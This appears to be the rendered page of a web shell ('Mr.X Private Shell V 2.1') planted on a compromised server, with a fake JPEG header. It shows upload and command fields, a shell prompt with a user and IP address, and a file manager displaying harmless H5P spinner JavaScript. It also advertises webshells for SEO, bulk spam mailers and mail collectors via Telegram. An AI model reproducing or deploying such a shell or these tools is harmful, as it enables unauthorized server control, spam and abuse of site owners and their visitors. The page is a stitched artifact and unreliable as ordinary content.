����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

airtcsob@216.73.216.249: ~ $
H5PEditor.widgets.arMarkerGeneratorSpinner = H5PEditor.arMarkerGeneratorSpinner = (function () {
  /**
   * Constructor.
   * @param {string} classNameBase Class name base to define spinner visuals.
   */
  function Spinner(classNameBase) {
    this.classNameBase = classNameBase;
    this.container = document.createElement('div');
    this.container.classList.add(this.classNameBase + "-container");
    this.spinnerElement = document.createElement('div');
    this.spinnerElement.classList.add(classNameBase); // Circle parts with different delays for the grow/shrink animation

    var circleHead = document.createElement('div');
    circleHead.classList.add(this.classNameBase + "-circle-head");
    this.spinnerElement.appendChild(circleHead);
    var circleNeckUpper = document.createElement('div');
    circleNeckUpper.classList.add(this.classNameBase + "-circle-neck-upper");
    this.spinnerElement.appendChild(circleNeckUpper);
    var circleNeckLower = document.createElement('div');
    circleNeckLower.classList.add(this.classNameBase + "-circle-neck-lower");
    this.spinnerElement.appendChild(circleNeckLower);
    var circleBody = document.createElement('div');
    circleBody.classList.add(this.classNameBase + "-circle-body");
    this.spinnerElement.appendChild(circleBody);
    this.container.appendChild(this.spinnerElement);
  }

  /**
   * Get the DOM.
   * @return {HTMLElement} Spinner container.
   */
  Spinner.prototype.getDOM = function getDOM() {
    return this.container;
  };

  /**
   * Show spinner.
   */
  Spinner.prototype.show = function show() {
    this.container.classList.remove(this.classNameBase + "-none");
  };

  /**
   * Hide spinner.
   */
  Spinner.prototype.hide = function hide() {
    this.container.classList.add(this.classNameBase + "-none");
  };

  return Spinner;
})();

Filemanager

Name Type Size Permission Actions
1947650d012a379648dd747946c35007889a3151 File 1.79 KB 0666